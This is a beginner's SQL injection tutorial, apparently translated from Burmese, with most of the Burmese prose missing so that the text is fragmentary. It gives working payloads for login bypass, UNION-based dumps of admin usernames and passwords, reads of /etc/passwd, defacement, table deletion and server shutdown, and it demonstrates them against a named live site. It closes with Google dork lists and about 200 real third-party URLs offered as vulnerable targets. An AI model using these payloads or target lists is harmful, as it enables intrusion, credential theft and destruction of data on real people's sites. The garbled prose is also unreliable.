SQL Injection Attack by 3thic0kiddi3

SQL Injection Attack
Myanmar Version for Begineers
3thic0kiddi3
SQL Injection Attack For Beginners By 3thic0kiddi3

-- SQL INJECTION (- BrB)
SQL injection web application
web application
(Hackers) SQL injection
web or db server
programming application,
web server SQL injection SQL
commands web page data
Company Network
port scanner sanner port

Web Server (Host Sever)
port 80 security port scanner
( )...
Web Hacking ... Web Hacking
SQL Injection ... .. SQL
Injection Web Browser ...
SQL Injection SQL injection Web development knowledge PHP

MysqL Knowledge
---DATABASE ?--... Database Database Data
Application ... Application Programming Interface (API)

Database(DB) servers Web
development data
Database usernames,
passwords
Database database

programmer code
database DB
servers
MySQL(Open
source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open
source),
SQLite ...
Database
--- - -Site username, password login site content

(username & password )
username & password (user registration
) BYPASSING LOGINS
programmer login User

name Password login
username admin password 12345 . ..
SQL query SELECT USER from database WHERE username='admin' AND
password='12345' ..... SELECT command
site programmer login
Hacker
username:a or 1=1-password:blank
SQL
query
SELECT USER from database WHERE username='a' or
1=1-- AND password=''
comment operator
comment operator /*
SELECT USER from database WHERE
username='a' or 1=1
1=1 query true OR query true
true 'a' user DB query
true site admin
... Vulnerable site
...
username:' or 1='1 password:' or 1='1
username:'
or '1'='1' password:' or '1'='1'

username:or 1=1 password:or 1=1
--- Data --SQL injection bypassing logins DB servers

Data ...
site link
---
--Site ...
In PHP ==>>
www.site.com/article.php?id=5
id
variable assign ' (apostrophe)
..
www.site.com/article.php?id=5'
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
[url=http://www.site.com/script.php?param=%]www.site.com/script.php?param=%[/url]
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'-www.site.com/script.php?param=Te'+'xt
[url=http://www.site.com/script.php?param=Tex%]www.site.com/script.php?param=Tex%[/url
]
.. ...
site vulnerable page loading ..
query string filtering "MySQL Syntax Error By '5'' In Article.php on line
15." Check the correct MySQL version MySQL Fetch error
page ... site vulnerable
' union select 1--
www.site.com/article.php?id=5
union select 1-In ASP
==>>
http://www.site.com/index.asp?id=5
' (apostrophe)
http://www.site.com/index.asp?id=5'
Microsoft
OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC
SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'table1' to a column of data type int.

/index.asp, line 5
error ASP, JSP, CGI, PHP web pages
URL parameters login page, search page, feedback

.. html page POST command ASP page
parameters .. HTML source code
"FORM" tag ...
<FORM action=Search/search.asp
method=post>
<input type=hidden name=A value=C>
</FORM>
<FORM></FORM>

<FORM
action=http://duck/Search/search.asp method=post>
<input
type=hidden name=A
value='a' or 1=1--">
</FORM>
value BYPASSING LOGINS
---Columns
--order by Columns .. URL query
... '/*' '--" ..
www.site.com/article.php?id=5 order by 1/*
2
..
...
3 Columns
... Column ...

http://sbisa.org/circle.php?id=26
..
http://sbisa.org/circle.php?id=26
value ' (apostrophe) ..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

/home/sbisaor/public_html/circle.php on line 10 error
..
.. SQL error ... DB Server MySQL
OK, Columns ...
http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ... error
7 error 6 Columns ...
UNION SELECT ALL statement ..

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ..
2,3,4 .. data Columns ...

---MySQL version -- Injection MySQL Version checking ... . Version Checking
@@version version() functions .. @@version
data column MySQL version ..
http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--

http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6-.. error unhex(hex())
..
http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6- Server MySQL version ...
user database check checking
..
www.site.com/article.php?id=5 UNION ALL SELECT
user(),2/*
database(),2/*
:- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
---MySQL 5 injection-- MySQL version 5.0.90 ... MySQL version 5

information_schema funtion DB server tables
columns ...
Tables table_name from information_schema.tables
Columns column_name from information_schema.columns
..
site
group_concat(table_name) Tables
group_concat(column_name) Columns ...
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from
information_schema.tables where table_schema=database()--
MySQL version @@version unhex(hex())

Table Column
http://sbisa.org/circle.php?id=-26 union select all
1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where
table_schema=database()- Columns
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from
information_schema.columns where table_schema=database()--
DB table ... tables
... user name password

table ...
group_concat .. username,
password columns
table from information_schema.tables
where table_schema=database-- ..
0x3a ":" hex code

http://sbisa.org/circle.php?id=-26 union select all
1,2,3,group_concat(username,0x3a,password),5,6 from
admin--
username password ...

password plaintext
password hashed hash cracker
..
admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org
Cain
& Able
www.oxid.it
hash password ... hash
crack adminlanetCreator ..
admin password ..
---MySQL version 4 injection--MySQL version 4 version 5 information_schema.tables and
information_schema.columns support table name column name
guess ... error message The error
reports pnc_article in the error pnc prefix table name pnc

table name user ..

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*
error table . ..
guess ... table name tbluser ..
www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*
table name column ...
www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM
tbluser/*
username password ...
Table name : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.
Injection Data ... Admin username &
password Admin Login Page ... Joomla /administrator
Wordpress /wp-admin .. site admin panel
..
admin panel finder ...
Admin Panel Finder
http://www.planetcreator.net/planetc...inpanelfinder/
---Site -- Site admin password admin panel

... SQL commands site contents
...
command
UPDATE:It is used to edit infos already in the db without deleting any rows.
DELETE:It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.
UPDATE:www.site.com/article.php?id=5
query
SELECT title,data,author FROM article WHERE id=5
(table name column )
site ...
www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*

www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY
SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*
page update
..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value

3' WHERE id=5/*
DELETE:- DB Server DELETE command ..
www.site.com/article.php?id=5 DELETE title,data,author FROM article/*
page delete table name WHERE
page id ...
www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*
DROP TABLE ... Table DROP Table
table name ...
www.site.com/article.php?id=5 DROP TABLE article/*
table contents ...
SHUTTING DOWN MySQL SERVER:
www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;
LOADFILE:
Server .htaccess, .htpasswd password files etc/passwd
LOADFILE ... ....
www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*
hex ..

load_file(0x272F6574632F70617373776427)
Hex based SQL Injection ..
* SELECT
LOAD_FILE(0x633A5C626F6F742E696E69)
server c:\boot.ini
..
---MySQL ROOT--MySQL
version 5 mysql.user table MySQL servers
... hash Password username ...
hash mysqlsha1 John The Ripper crack ..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from
mysql.user/*
InsidePro Password Recovery Software ..
http://www.insidepro.com
--- MySQL commands ..--ABORT abort the current transaction

ALTER DATABASE change a database
ALTER GROUP add users to a group or remove users from a group
ALTER TABLE change the definition of a table
ALTER TRIGGER change the definition of a trigger
ALTER USER change a database user account

ANALYZE collect statistics about a database
BEGIN start a transaction block
CHECKPOINT force a transaction log checkpoint
CLOSE close a cursor
CLUSTER cluster a table according to an index
COMMENT define or change the comment of an object
COMMIT commit the current transaction
COPY copy data between files and tables
CREATE AGGREGATE define a new aggregate function
CREATE CAST define a user-defined cast
CREATE CONSTRAINT TRIGGER define a new constraint trigger
CREATE CONVERSION define a user-defined conversion
CREATE DATABASE create a new database
CREATE DOMAIN define a new domain
CREATE FUNCTION define a new function
CREATE GROUP define a new user group
CREATE INDEX define a new index
CREATE LANGUAGE define a new procedural language
CREATE OPERATOR define a new operator
CREATE OPERATOR CLASS define a new operator class for indexes
CREATE RULE define a new rewrite rule
CREATE SCHEMA define a new schema
CREATE SEQUENCE define a new sequence generator
CREATE TABLE define a new table
CREATE TABLE AS create a new table from the results of a query
CREATE TRIGGER define a new trigger
CREATE TYPE define a new data type
CREATE USER define a new database user account
CREATE VIEW define a new view
DEALLOCATE remove a prepared query
DECLARE define a cursor

DELETE delete rows of a table
DROP AGGREGATE remove a user-defined aggregate function
DROP CAST remove a user-defined cast
DROP CONVERSION remove a user-defined conversion
DROP DATABASE remove a database
DROP DOMAIN remove a user-defined domain
DROP FUNCTION remove a user-defined function
DROP GROUP remove a user group
DROP INDEX remove an index
DROP LANGUAGE remove a user-defined procedural language
DROP OPERATOR remove a user-defined operator
DROP OPERATOR CLASS remove a user-defined operator class
DROP RULE remove a rewrite rule
DROP SCHEMA remove a schema
DROP SEQUENCE remove a sequence
DROP TABLE remove a table
DROP TRIGGER remove a trigger
DROP TYPE remove a user-defined data type
DROP USER remove a database user account
DROP VIEW remove a view
END commit the current transaction
EXECUTE execute a prepared query
EXPLAIN show the execution plan of a statement
FETCH retrieve rows from a table using a cursor
GRANT define access privileges
INSERT create new rows in a table
LISTEN listen for a notification
LOAD load or reload a shared library file
LOCK explicitly lock a table
MOVE position a cursor on a specified row of a table
NOTIFY generate a notification

PREPARE create a prepared query
REINDEX rebuild corrupted indexes
RESET restore the value of a run-time parameter to a default value
REVOKE remove access privileges
ROLLBACK abort the current transaction
SELECT retrieve rows from a table or view
SELECT INTO create a new table from the results of a query
SET change a run-time parameter
SET CONSTRAINTS set the constraint mode of the current transaction
SET SESSION AUTHORIZATION set the session user identifier and the current user identifier
of the current session
SET TRANSACTION set the characteristics of the current transaction
SHOW show the value of a run-time parameter
START TRANSACTION start a transaction block
TRUNCATE empty a table
UNLISTEN stop listening for a notification
UPDATE update rows of a table
VACUUM garbage-collect and optionally analyze a databasee
SQL
Injection ... functions
... SQL commands
SQL commands
---------------------------------------------------------------------------------------------------------------- SQL Injection

- SQL Injection BrB (planet creator)
SQL Error Website

SQL Vuln Google Dork Dork
Result

Dork SQL Error
Target Brb Attack
Google Dork For SQL Injection
by 3thic0kiddi3
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:event.php?id=
inurl:sql.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:rub.php?idr=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:show.php?id=
inurl:staff_id=
inurl:game.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:sql.php?id=
inurl:humor.php?id=
inurl:sem.php3?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurlreview.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:main.php?id=
inurl:read.php?id=
inurlerson.php?id=
inurl:view.php?id=
inurl:rub.php?idr=
inurl:index.php?=
inurlroduct.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurlost.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:event.php?id=
inurl:sql.php?id=
inurl:ages.php?id=
inurl:read.php?id=
inurl:rub.php?idr=
inurl:story.php?id=
inurl:look.php?ID=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:play_old.php?id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:show.php?id=
inurl:staff_id=
inurl:Stray-Questions-View.php?num=
inurl:game.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:humor.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:sem.php3?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:preview.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:participant.php?id=
inurl:main.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:view.php?id=
inurl:rub.php?idr=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:publications.php?id=
inurl:prod_info.php?id=
inurl:productinfo.php?id=
inurl:product.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:product_ranges_view.php?ID=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:preview.php?id=
inurl:pages.php?id=
inurl:read.php?id=
inurl:rub.php?idr=
inurl:story.php?id=
inurl:look.php?ID=
inurl:opinions.php?id=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:show.php?id=
inurl:staff_id=
inurl:game.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:sql.php?id=
inurl:humor.php?id=
inurl:sem.php3?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurlreview.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:main.php?id=
inurl:read.php?id=
inurlerson.php?id=
inurl:view.php?id=
inurl:rub.php?idr=
inurl:index.php?=
inurlroduct.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurlost.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:event.php?id=
inurl:sql.php?id=
inurl:ages.php?id=
inurl:read.php?id=
inurl:rub.php?idr=
inurl:story.php?id=
inurl:look.php?ID=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Dork Dork
SQL Error (Vuln)

http://www.registerforevent.rs/event.php?id=1191'
http://www.sedicifilm.it/games.php?id_cat3=61'
http://www.adas-fusion.eu/theme.php?id=2'
http://www.actforkids.com.au/news_full.php?id=111'
http://www.ezskincare.com/theme.php?id=1'
http://hcpoa.com/readnews.php?id=32'
http://www.reallymeansounds.com/events/event.php?id=477'
http://www.themackwoodgroup.com/view_product.php?id=1027120263040942700'
http://www.vacancesetmontagne.fr/theme.php?id=7'
http://www.inner-live.com/index.php?task=channels&action=view&channel_id=452'
http://www.super-buys.co.uk/shops.php?field1=127'
http://www.aportescriticos.com.ar/es/curriculum.php?id_cv=2'
http://www.vainerepaoliello.com.br/curriculum.php?id=7'
http://www.matamorosenred.com/ver_curriculum.php?id=23'
http://ultimatehomedesign.com/news-detail.php?id=312'
http://www.firagirona.com/participant.php?id=108&cl=5634'
http://www.ceripp.it/curriculum.php?id=1'
http://www.dentistry.co.uk/news/news_detail.php?id=1442'
http://lumopro.com/product.php?id=66'
http://www.rogersspecialtysales.ca/show.php?id=18''
http://dinebaltimore.com/review.php?id=115'
http://www.bia2.com/music-review/review.php?id=182'
http://www.worldstylingtt.com/category.php?id=5'
http://spokesrecords.com/releases.php?id=12'
http://www.plusline.org/article.php?id=4695'
http://www.wedding-cake-toppers.com.au/productinfo.php?ID=15'
http://dvdholocaust.com/review.php?id=577'
http://www.laserltd.ps/cat/showimg.php?id=1040'
http://www.abalar.es/ampliar_material.php?id_material=11'
http://www.clicfolio.com/clicfolio/curriculum.php?id=10505'
http://www.fundraisingnetwork.org/cat-Games.php?id=39'
http://www.f4customs.com/videos_pages.php?id=5'
http://bbs.yayu.org/look.php?id=227'
http://www.ngo-monitor.org/article.php?id=1564'
http://www.armorysquareofsyracuse.com/main/shopping.php?id=15'
http://www.elitebicycles.com/athletes_detail.php?id=42'
http://enpi-info.eu/main.php?id=344&id_type=2'
http://www.rentray.nl/over_rentray.php?id=14'
http://games.zbeng.net/game.php?id=2'
http://www.waukee.org/event.php?id=19'
http://www.narkissosshavingoil.com/product/item.php?ID=2'
http://www.themetalcircus.com/review.php?id=3096'
http://www.laserltd.ps/cat/showimg.php?id=85'
http://www.cedec.ca/index.php?id=1'
http://www.maxprotech.com/maxpro-product-detail.php?id=48'
http://www.cam-ceeds.org/event.php?ID=30'
http://www.ferobrake.co.za/productdetail.php?id=19'
http://www.illoomballoon.com/news.php?id=112'
http://www.skbcases.com/music/news/news-detail.php?id=24'
http://www.rec.org/event.php?id=286'
http://www.playdowns.com/nbca/event.php?id_cmp=10'
http://www.selfpp.com/gallery.php?ID=8'
http://tko.sciencenoodle.com/game.php?id=60987'
http://www.dracoders.com/games.php?id=7'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=32+'
http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=29+'
http://www.shoppingtang.com/productinfo.php?id=294'
http://www.sealchemistry.co.za/readnews.php?id=10'
http://www.notebookfocus.com/readnews.php?id=343'
http://www.hkyongnuo.com/e-detail.php?ID=241'
http://www.bryansmarine.com/section.php?id=10'
http://hcpoa.com/readnews.php?id=73'
http://mappn.com/game.php?id=11'
http://www.onradio.gr/player.php?id=388'
http://www.vertexlaw.co.uk/news/detail.php?id=000147'
http://www.wildarttaxidermy.co.uk/gallery.php?id=16'
http://www.kudosshowers.co.uk/gallery.php?id=3'
http://www.scotclimb.org.uk/gallery.php?id=3'
http://www.cfnielsen.com/material.php?id=19'
http://ww2.fairfaxtimes.com/cms/story.php?id=1195'
http://www.bernard-vidal.com/view-photo.php?id=75'
http://ww2.fairfaxtimes.com/cms/story.php?id=1050'
http://www.aoamumbai.in/publications.php?id=49'
http://www.infocajeme.com/humor.php?id=12'
http://www.funlandz.com/find_person.php?id=180071'
http://www.gorodokboxing.com/material.php?id=2'
http://www.datamp.org/patents/search/xrefPerson.php?id=6509'
http://www.babycareadvice.com/babycare/general_help/article.php?id=18'
http://kb.calyxsupport.com/kb/article.php?id=308'
http://www.gymka.com/english/detail_produit.php?id=328'
http://www.thefutureisfierce.com/releases.php?ID=49'
http://www.datamp.org/patents/search/xrefPerson.php?id=7413'
http://baywoodbest.com/listingPop.php?Id=620'
http://www.nissi-beach.com/section.php?id=13'
http://evt-me.com/newsDetail.php?id=8'
http://www.istl.com/view-product.php?ID=54'
http://www.fitnessbuildshealth.com/trainers.php?id=88'
http://www.techvision.co.uk/news.php?id=45'
http://www.guruslodge.com/index.php?topic=6484.0'
http://www.fanfics.ru/read.php?id=1515'
http://www.henleystandard.co.uk/news/news.php?id=36113'
http://www.facingthegiants.com/news.php?id=2'
http://www.pioneer-group.co.uk/event.php?id=16'
http://terekon.ru/material.php?id=6'
http://www.chambers.ie/preview.php?id=889'
http://www.yboaofnc.com/event.php?id=3'
http://www.amandala.com.bz/newsadmin/preview.php?id=6926'
http://princesspaper.com/pages/view-product.php?id=2'
http://rec.org/event.php?id=306'
http://www.bombasticlife.com/place/review.php?id=504'
http://www.kingslynnarts.co.uk/whatson_event.php?id=46'
http://www.nowgen.org.uk/facilities/events/event.php?id=30'
http://www.walesdirectory.co.uk/events/event.php?id=2445'
http://www.doggerfisher.com/artists/publications.php?id=47'
https://powertraveller.com/news/detail.php?id=000126'
http://www.prosportsgroup.com/agent-info.php?id=55'
http://www.highlandvillage.org/event.php?id=72'
http://www.edseven.com/item_look.php?id=4'
http://www.nmtf.co.uk/index.php?id_cpg=1'
http://www.minesandcommunities.org/look.php?id=54'
http://infocajeme.com/humor.php?id=38'
http://www.geneticsandsociety.org/article.php?id=282'
http://www.chambers.ie/preview.php?id=932'
http://www.worapongengineering.com/project_pop.php?Id=32'
http://www.twitney.co.uk/theme.php?id=5'
http://www.anchoryachts.com/preview.php?ID=249'
http://www.nsche.org.ng/communiquedetail.php?ID=3'
http://www.feicuidao.com/jqzx_look.php?id=29'
http://www1.kingsborough.edu/sub-other/sub-student/scholarshipdb/pop.php?id=331'
http://www.bonsaitrees.com/gallery.php?id=7'
http://www.amrproductions.nl/faq/view_faq.php?id=7'
http://reallymeansounds.com/events/event.php?id=529'
http://holidayvillagerodos.com/gallery.php?id=1'
http://www.schoolofbhagavadgita.org/shopping.php?id=45'
http://www.ecstasydata.org/view.php?ID=1888'
http://www.pialombardia4.it/newscat.php?id_newscategory=2'
http://www.konceive.com.au/riverside/investAnnounce.php?id=43'
http://www.eventdirect.ca/game.php?ID=62'
http://www.humanrights.uconn.edu/publications.php?id=37'
http://www.sportident.co.uk/full_story.php?id=115'
http://courtnews.co.nz/story.php?id=1912'
http://biclopsgames.com/game.php?id=6'
http://www.humanrights.uconn.edu/publications.php?id=19'
http://apiexchange.com/index_main.php?id=1'
http://www.hotelsayianapa.com/section.php?id=11'
http://www.kipepeo.org/insect-gallery.php?id=58'
http://www.fn-franchecomte.com/communique_detail.php?id=145'
http://www.stonemarket.co.uk/section.php?id=1'
http://www.skywatcher.com/swtinc/product.php?id=30&class1=1&class2=102'
http://www.psychology.org.nz/cms_show_download.php?id=559'
http://www.medix.com.hr/aboutbook.php?id=30'
http://thehimalayantimes.com/tgifnfw11/theme.php?id=259'
http://www.excellentdevelopment.com/news_detail.php?id=136'
http://www.simon-dean.co.uk/motor_news/motor_news_detail.php?ID=35'
http://www.natalpress.com.br/humor.php?id=10627'
http://www.cross.tv/52818?channel_id=1104'
http://www.cbmin.org/cbm/staff?staff_id=10'
http://olympicresidence.com/gallery.php?id=13'
http://www.ath-elite.com.au/trainers.php?id=28'
http://familynewsabout.com/aboutBook.php?id=3241'
http://www.mvsport-tuning.com/viewProduct.php?id=43'
http://www.leadacidbatteryinfo.org/newsdetail.php?id=18'
http://www.avmaniacs.com/review.php?id=1054'
http://byeu.org/photos/viewphoto.php?ID=194'
http://www.cbmin.org/cbm/staff?staff_id=6'
http://www.coastal-koi.com/view_product.php?id=954'
http://www.drummajorinstitute.org/events/unique_event.php?ID=38'
http://www.ldschurchtemples.com/sandiego/gallery/download.php?id=272'
http://www.dvdmaniacs.net/review.php?id=318'
http://www.themarketingsite.com/live/content.php?Item_ID=5925'
http://www.dmgems.co.uk/pages.php?id_sec=15'
http://www.faithinplace.org/news.php?ID=58'
http://www.barcode.md/post.php?id=20'
http://www.sheridan-uk.com/news_detail.php?id=52'
http://www.individualcars.com/inventory/detail.php?ID=685'
http://www.bsp.org.uk/news_full.php?id=31'
http://flatbearconsulting.com/pages.php?id_pag=6'
http://www.girls.njpanthers.com/preview.php?id=25'
http://www.hotproperties-bayarea.com/readnews.php?id=2'
http://www.shxingba.com/product/prodinfo.php?id=62'
http://www.cheap-web-hosting-info.com/hosting_review.php?id=8'
http://inrecs.com/releases.php?id=37'
http://www.planetbollywood.com/displayReview.php?id=m101411095354'
http://techloopreviews.com/review.php?id=89'
http://dailyexhibit.com/theme.php?id=1224 ForceRecrawl: 0'
http://yoga.ge/pages/theme.php?id=109'
http://terekon.ru/material.php?id=1'
http://www.ristorantelarsenale.com/newscat.php?id_newscategory=2'
http://www.thejewishmuseum.org/site/pages/event.php?id=348'
http://www.peterduff.com/main.php?ID=1'
http://www.sagemont.com/class_pages.php?id=940170'
http://www.nutritioncare.net/pages.php?id=12'
http://www.therightdentist.com/profileview.php?id=124859'
http://www.oceansurf.ca/gallery.php?id=16'
http://www.gtamodding.it/area/index.php?act=view&id=34+...%2F%2Ftrainers.php%3Fid%3D41+union+select+0%2C1%2C2%2Cconcat%28email%2C0x3a%2Cpass%29%2C4%2C5%2C6%
2C7%2C8+f rom+koobi_user'
http://www.craftaustralia.org.au/library/review.php?id=blurring_the_boundaries'
http://www.luimo.org/curriculum.php?id=ST000019'
http://www.djangosolos.com/title.php?id=128'
http://www.kagakribet.com/humor.php?id=157'
http://fitnessbuildshealth.com/trainers.php?id=32'
http://www.portalararuna.com.br/2011/humor.php?id=10'
http://gp.org/speakers/detail.php?ID=42'
http://www.glac.fr/en/produit.php?id=84'
http://www.thefutureisfierce.com/releases.php?ID=25'
http://internal.ccuniversity.edu/ministryjobboard/post.php?ID=5242'
http://www.trailercityportland.com/product.php?id=559'
http://www.valiani.com/computerised_detail.php?ID=1'
http://www.craftaustralia.org.au/library/review.php?id=ghost_nets'
http://www.jocuri-online.net/game.php?id=5'
http://www.4wdsystems.com.au/index.php?id=29'
http://www.amrproductions.nl/faq/view_faq.php?id=8'
http://www.actipack.fr/actipack/lang_EN/fiche_produit.php?id=29'
http://campus.sanook.com/inlove/read.php?id=86'
http://www.ics.heacademy.ac.uk/publications/book_reviews/full_review.php?id=421'
http://www.ianforsythphotographer.com/main.php?id=1'
http://www.saumon-fqsa.qc.ca/en/section.php?ID=16'
http://www.dkggroup.com/newsdetail.php?id=165'
http://www.datraveler.com/main/theme.php?id=214'
http://www.constructionspares.com/main.php?ID=6'
http://www.punp.edu.ph/main.php?id=33'
